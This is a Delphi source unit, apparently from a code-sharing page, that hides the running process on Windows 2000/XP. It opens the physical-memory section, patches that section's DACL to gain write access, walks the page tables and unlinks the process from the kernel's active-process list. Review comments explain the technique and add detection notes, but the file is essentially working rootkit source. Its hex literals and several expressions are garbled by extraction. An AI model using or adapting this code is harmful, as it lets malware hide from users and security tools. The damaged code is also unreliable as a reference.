// Process-hiding unit (the "unit" header line is outside this view). The only
// exported routine is Myhideprocess. The implementation resolves two ntdll
// exports at run time, opens the \device\physicalmemory section read/write
// (patching its DACL if the first open is denied), walks the x86 page tables
// from a hard-coded page-directory address, and patches kernel memory from
// user mode.
// NOTE(review): extraction damage is left as found on this page -- hexadecimal
// literals are split by a space ($C 0000004), the separator lines and several
// trailing comments ("Modify by Dot.", "Kteb", "Kpeb") lost their leading "//",
// string literals are padded with spaces and some "End" lack ";" -- so the unit
// does not compile as shown. Only formatting has been changed here.
interface
function Myhideprocess:boolean;
Implementation
uses Windows, Classes, Aclapi, Accctrl;
Type NTSTATUS = Longint;
// The comment after Const is the NT_SUCCESS test (status >= 0);
// Openphysicalmemory applies it inline as Longint (status) >= 0.
Const//nt_success (status) (status) >= 0)
// Of these two NTSTATUS values only status_access_denied is referenced below.
Status_info_length_mismatch = NTSTATUS ($C 0000004);
status_access_denied = NTSTATUS ($C 0000022);
// OBJ_* object-attribute flags. None is used in the visible code: the
// Object_attributes.Attributes field is set to 0 in Openphysicalmemory.
Obj_inherit = $00000002;
Obj_permanent = $00000010;
Obj_exclusive = $00000020;
Obj_case_insensitive = $00000040;
obj_openif = $00000080;
Obj_openlink = $00000100;
Obj_kernel_handle = $00000200;
Obj_valid_attributes = $000003F2;
Type
// IO_STATUS_BLOCK: declared but not referenced in the visible code.
pio_status_block = ^io_status_block;
Io_status_block = Record Status:ntstatus; Fobject:dword; End
// Native UNICODE_STRING and OBJECT_ATTRIBUTES layouts, filled in by
// Openphysicalmemory and passed to Zwopensection.
punicode_string = ^unicode_string;
Unicode_string = Record Length:word; Maximumlength:word; Buffer:pwidechar; End
Pobject_attributes = ^object_attributes;
Object_attributes = Record Length:dword; Rootdirectory:pointer; objectname:punicode_string; Attributes:dword; Securitydescriptor:pointer; Securityqualityofservice:pointer; End
// Prototypes of the two ntdll exports resolved by Initntdll.
Tzwopensection = function (sectionhandle:phandle; Desiredaccess:access_mask; objectattributes:pobject_attributes): NTSTATUS; stdcall;
Trtlinitunicodestring = procedure (destinationstring:punicode_string; Sourcestring:pwidechar); stdcall;
var
// Function pointers set by Initntdll. Neither is checked for nil before the
// calls in Openphysicalmemory, so a failed GetProcAddress faults there.
rtlinitunicodestring:trtlinitunicodestring = nil;
Zwopensection:tzwopensection = nil;
// LoadLibrary handle for ntdll; released by Closentdll.
G_hntdll:thandle = 0;
// Mapped view of the page-directory page (set by Openphysicalmemory, never
// unmapped in the visible code).
G_pmapphysicalmemory:pointer = nil;
// Section handle for \device\physicalmemory (set by Openphysicalmemory,
// closed by Yhideprocess).
G_hmpm:thandle = 0;
// Never used in the visible code.
G_hmpm2:thandle = 0;
// Filled by Openphysicalmemory (GetVersionEx); the minor version is read again
// by Yhideprocess to choose structure offsets.
G_osvi:osversioninfo;
// One-shot latch for Myhideprocess: once True, Yhideprocess is not run again.
B_hide:boolean = false;
---------------------------------------------------------------------------
// Loads ntdll.dll and resolves RtlInitUnicodeString / ZwOpenSection into the
// globals above. Returns False only when LoadLibrary fails; a nil result from
// GetProcAddress is not checked (and the export names as printed on this page
// are lower-cased and space-padded, which GetProcAddress would not resolve --
// presumably extraction damage).
function Initntdll:boolean;
Begin
G_hntdll: = LoadLibrary (' Ntdll.dll ');
If 0 = G_hntdll THEN BEGIN Result: = FALSE; Exit; End
Rtlinitunicodestring: = GetProcAddress (G_hntdll, ' rtlinitunicodestring ');
Zwopensection: = GetProcAddress (G_hntdll, ' zwopensection ');
Result: = True;
End
---------------------------------------------------------------------------
// Releases the ntdll handle taken by Initntdll (if any) and resets it to 0.
// The two function-pointer globals are left pointing into the unloaded module.
procedure Closentdll;
Begin
if (0 <> g_hntdll) then FreeLibrary (G_hntdll);
G_hntdll: = 0;
End
---------------------------------------------------------------------------
// Rewrites the DACL of the given section handle so that the trustee named by
// the ' current_user ' literal (presumably the special CURRENT_USER trustee
// name, space-padded by extraction -- confirm) is granted Section_map_write.
// Called by Openphysicalmemory when the first open of \device\physicalmemory
// returns status_access_denied.
// Defects visible here: none of the three error branches Exits, so
// SetEntriesInAcl runs with a nil Pdacl after a failed GetSecurityInfo and
// SetSecurityInfo runs with a nil Pnewdacl after a failed SetEntriesInAcl;
// each branch frees psd^ although Psd is declared ppsecurity_descriptor (one
// level of indirection more than GetSecurityInfo's out-parameter); nothing is
// freed on the success path.
// Defender note: changing the DACL of a kernel object such as the physical
// memory section is the most conspicuous step of this unit and a natural
// audit / detection point.
procedure Setphyscialmemorysectioncanbewrited (Hsection:thandle);
var Pdacl:pacl; Psd:ppsecurity_descriptor; Pnewdacl:pacl; Dwres:dword; ea:explicit_access;
Begin
PDACL: = nil;
PSD: = nil;
Pnewdacl: = nil;
// Fetch the current DACL so the new entry can be merged into it.
Dwres: = GetSecurityInfo (Hsection, Se_kernel_object, dacl_security_information, nil, nil, pdacl, Nil, PSD);
If error_success <> dwres then BEGIN if Assigned (PSD) then LocalFree (hlocal (psd^)); If Assigned (Pnewdacl) then LocalFree (hlocal (PNEWDACL)); End
// One EXPLICIT_ACCESS entry: grant SECTION_MAP_WRITE, no inheritance.
ZeroMemory (@ea, sizeof (explicit_access));
Ea.grfaccesspermissions: = Section_map_write;
Ea.grfaccessmode: = grant_access;
Ea.grfinheritance: = no_inheritance;
Ea. Trustee.trusteeform: = Trustee_is_name;
Ea. Trustee.trusteetype: = Trustee_is_user;
Ea. Trustee.ptstrname: = ' current_user ';
Dwres: = SetEntriesInAcl (1, @ea, Pdacl, Pnewdacl);
If error_success <> dwres then BEGIN if Assigned (PSD) then LocalFree (hlocal (psd^)); If Assigned (Pnewdacl) then LocalFree (hlocal (PNEWDACL)); End
Dwres: = SetSecurityInfo (Hsection, Se_kernel_object, dacl_security_information, nil, nil, pnewdacl, nil);
If error_success <> dwres then BEGIN if Assigned (PSD) then LocalFree (hlocal (psd^)); If Assigned (Pnewdacl) then LocalFree (hlocal (PNEWDACL)); End
End
---------------------------------------------------------------------------
// Opens the \device\physicalmemory section for read/write and maps one page
// ($1000 bytes) at the hard-coded physical address that Lineartophys then
// treats as the page directory: $30000 for version 5.0, $39000 for 5.1.
// Any other major/minor version returns 0, so the version gate is also the
// technique's lifetime (later releases do not expose this object to user
// mode -- NOTE(review): verify against the target release).
// On status_access_denied it reopens with Read_control or WRITE_DAC, patches
// the DACL via Setphyscialmemorysectioncanbewrited, closes that handle and
// retries the read/write open. The result of the WRITE_DAC reopen is
// discarded, so on failure the DACL patch and CloseHandle act on whatever
// G_hmpm held before. Returns the section handle (also left in G_hmpm) or 0.
function Openphysicalmemory: Thandle;
var status:ntstatus; physmemstring:unicode_string; Attributes:object_attributes; Phydirectory:dword;
Begin
G_osvi.dwosversioninfosize: = sizeof (OSVERSIONINFO);
GetVersionEx (G_OSVI);
if (5 <> g_osvi.dwmajorversion) THEN begin Result: = 0; Exit; End
// Physical address of the page directory, per minor version.
Case G_osvi.dwminorversion of 0:phydirectory: = $30000; 1:phydirectory: = $39000; ELSE begin Result: = 0; Exit; End End
// Calls through the function pointer set by Initntdll without a nil check.
Rtlinitunicodestring (@physmemString, ' \device\physicalmemory ');
Attributes. Length: = SizeOf (object_attributes);
Attributes. RootDirectory: = nil;
Attributes. ObjectName: = @physmemString;
Attributes. Attributes: = 0;
Attributes. SecurityDescriptor: = nil;
Attributes. Securityqualityofservice: = nil;
Status: = Zwopensection (@g_hMPM, Section_map_read or Section_map_write, @attributes);
if (status = status_access_denied) THEN begin Zwopensection (@g_hMPM, Read_control or WRITE_DAC, @attributes); Setphyscialmemorysectioncanbewrited (G_HMPM); CloseHandle (G_HMPM); Status: = Zwopensection (@g_hMPM, Section_map_read or Section_map_write, @attributes); End
// Inline NT_SUCCESS test (see the comment after Const).
If not (Longint (status) >= 0) THEN begin Result: = 0; Exit; End
G_pmapphysicalmemory: = MapViewOfFile (G_HMPM, file_map_read or File_map_write, 0, Phydirectory, $1000);
if (g_pmapphysicalmemory = nil) THEN BEGIN Result: = 0; Exit; End
Result: = G_HMPM;
End
//---------------------------------------------------------------------------
// Translates a virtual address to a physical one by walking the x86 page
// tables: baseaddress is the mapped page directory and the top 10 bits of
// addr select the page-directory entry. Returns nil when the PDE or PTE is
// not present (bit 0 clear). A large-page PDE (bit 7, $00000080) is resolved
// directly from the PDE and the low 22 bits of addr; otherwise the page-table
// page is mapped through G_hmpm, indexed by bits 21..12 of addr, and unmapped
// again. The MapViewOfFile result is used without a nil check.
// NOTE(review): the two "Modify by Dot." lines replaced the array-index forms
// immediately above them, which are now dead stores; on this page the shift
// count after "shr" is missing from both replacement lines (the array-index
// forms show the intended shifts), the PTE mask reads "$FFFFF", the other
// masks are split ("$FFC 00000", "$FFFFF 000"), and the "if (0 = (PTE and 1)"
// line lacks a closing parenthesis -- all presumably extraction damage.
function Lineartophys (baseaddress:pulong; addr:pointer): Pointer;
var vaddr, PGDE, PTE, paddr, Tmp:dword;
Begin
VADDR: = DWORD (addr);
PGDE: = baseaddress[vaddr shr 22];
PGDE: = Pulong (DWORD (baseaddress) + (vaddr shr) * SIZEOF (ULONG)) ^; Modify by Dot.
// PDE present bit.
If 0 = (PGDE and 1) THEN BEGIN Result: = nil; Exit; End
// PDE page-size bit: large page, no page table to walk.
TMP: = PGDE and $00000080;
if (0 <> tmp) THEN BEGIN PADDR: = (PGDE and $FFC 00000) + (VADDR and $003FFFFF); End
ELSE begin PGDE: = DWORD (MapViewOfFile (G_HMPM, 4, 0, PGDE and $FFFFF 000, $1000));
PTE: = (Pdword (PGDE)) [(Vaddr and $003ff000) SHR 12];
PTE: = Pdword (PGDE + ((vaddr and $003ff000) shr) * SIZEOF (DWord)) ^; Modify by Dot.
// PTE present bit.
if (0 = (PTE and 1) THEN BEGIN Result: = nil; Exit; End
PADDR: = (PTE and $FFFFF) + (VADDR and $00000FFF);
UnmapViewOfFile (Pointer (PGDE));
End
Result: = Pointer (PADDR);
End
---------------------------------------------------------------------------
// Reads one DWORD of memory at virtual address addr: translates it with
// Lineartophys against the page directory in G_pmapphysicalmemory, maps the
// containing physical page through G_hmpm, reads the DWORD at the page
// offset and unmaps. Returns 0 when MapViewOfFile fails, which callers cannot
// tell from a genuine 0 (Yhideprocess uses the value as a pointer unchecked).
// A nil from Lineartophys is likewise passed on as physical address 0.
// The first RET assignment is the pre-"Modify by Dot." form and a dead store.
function GetData (addr:Pointer): DWORD;
var phys, Ret:dword; Tmp:pdword;
Begin
Phys: = ULONG (Lineartophys (G_pmapphysicalmemory, Pointer (addr)));
TMP: = Pdword (MapViewOfFile (G_HMPM, file_map_read or File_map_write, 0, Phys and $FFFFF 000, $1000));
if (nil = tmp) THEN BEGIN Result: = 0; Exit; End
RET: = tmp[(Phys and $FFF) SHR 2];
RET: = Pdword (DWORD (TMP) + ((Phys and $FFF) SHR 2) * SIZEOF (DWORD)) ^; Modify by Dot.
UnmapViewOfFile (TMP);
Result: = ret;
End
// Writes one DWORD of memory at virtual address addr, mirroring GetData but
// with a write-only mapping. Returns False when MapViewOfFile fails; the
// caller (Yhideprocess) ignores the result. The first Tmp[...] assignment is
// the pre-"Modify by Dot." form, so the page is written twice.
function SetData (addr:pointer; data:dword): Boolean;
var Phys:dword; Tmp:pdword;
Begin
Phys: = ULONG (Lineartophys (G_pmapphysicalmemory, Pointer (addr)));
TMP: = Pdword (MapViewOfFile (g_hmpm, File_map_write, 0, Phys and $FFFFF 000, $1000));
if (nil = tmp) THEN BEGIN Result: = FALSE; Exit; End
Tmp[(Phys and $FFF) SHR 2]: = data;
Pdword (DWORD (TMP) + ((Phys and $FFF) SHR 2) * SizeOf (DWORD) ^: = data; Modify by Dot.
UnmapViewOfFile (TMP);
Result: = TRUE;
End
//---------------------------------------------------------------------------
// Disabled unhandled-exception filter, left in C syntax inside a brace
// comment; referenced only by the commented-out call at the top of
// Yhideprocess. Its intent is to terminate the process on any fault.
{long __stdcall exeception (struct _exception_pointers *tmp) begin ExitProcess (0); return 1; END}
//---------------------------------------------------------------------------
// The hiding step. After Initntdll and Openphysicalmemory succeed it reads
// the current thread pointer from the fixed address $FFDFF 124 (the original
// trailing comment says "Kteb"; on x86 this is presumably the KPCR
// current-thread slot -- confirm), the owning process from thread + $44
// ("Kpeb"), then loads a forward/backward link pair at a version-specific
// offset ($A 0 / $A 4 on 5.0, $88 / $8c on 5.1) and writes each neighbour's
// link past this entry, i.e. unlinks this process from a kernel doubly-linked
// list (consistent with EPROCESS.ActiveProcessLinks on those builds -- verify
// against symbols). Returns True on either supported minor version, False
// otherwise. Nothing is validated: a 0 from GetData is dereferenced as a
// pointer and SetData's Boolean is ignored. The section handle is closed and
// ntdll released on every path, but G_pmapphysicalmemory is never unmapped.
// Defender note: a process absent from the active-process list but still
// visible through handle tables, thread lists or scheduler structures is the
// standard cross-view signal for this kind of unlinking.
function Yhideprocess:boolean;
var thread, Process:dword; FW, Bw:dword;
Begin//SetUnhandledExceptionFilter (exeception);
if (false = Initntdll) THEN BEGIN Result: = FALSE; Exit; End
if (0 = openphysicalmemory) THEN BEGIN Result: = FALSE; Exit; End
Thread: = GetData (Pointer ($FFDFF 124)); Kteb
Process: = GetData (Pointer (thread + $44)); Kpeb
// Version 5.0 layout.
if (0 = g_osvi.dwminorversion) THEN BEGIN FW: = GetData (Pointer (process + $A 0)); BW: = GetData (Pointer (Process + $A 4)); SetData (Pointer (fw + 4), BW); SetData (Pointer (BW), FW); Result: = TRUE; End
// Version 5.1 layout.
else if (1 = g_osvi.dwminorversion) THEN BEGIN FW: = GetData (Pointer (process + $88)); BW: = GetData (Pointer (process + $8c)); SetData (Pointer (fw + 4), BW); SetData (Pointer (BW), FW); Result: = TRUE; End
ELSE begin Result: = False; End
CloseHandle (G_HMPM);
Closentdll;
End
// Public entry point. Runs Yhideprocess at most once per process: B_hide
// latches a True result, while a False result leaves B_hide clear so a later
// call retries. Returns the latched value.
function Myhideprocess:boolean;
Begin
if not b_hide then begin b_hide: = yhideprocess; End
Result: = B_hide;
End
End.
Delphi Hidden Process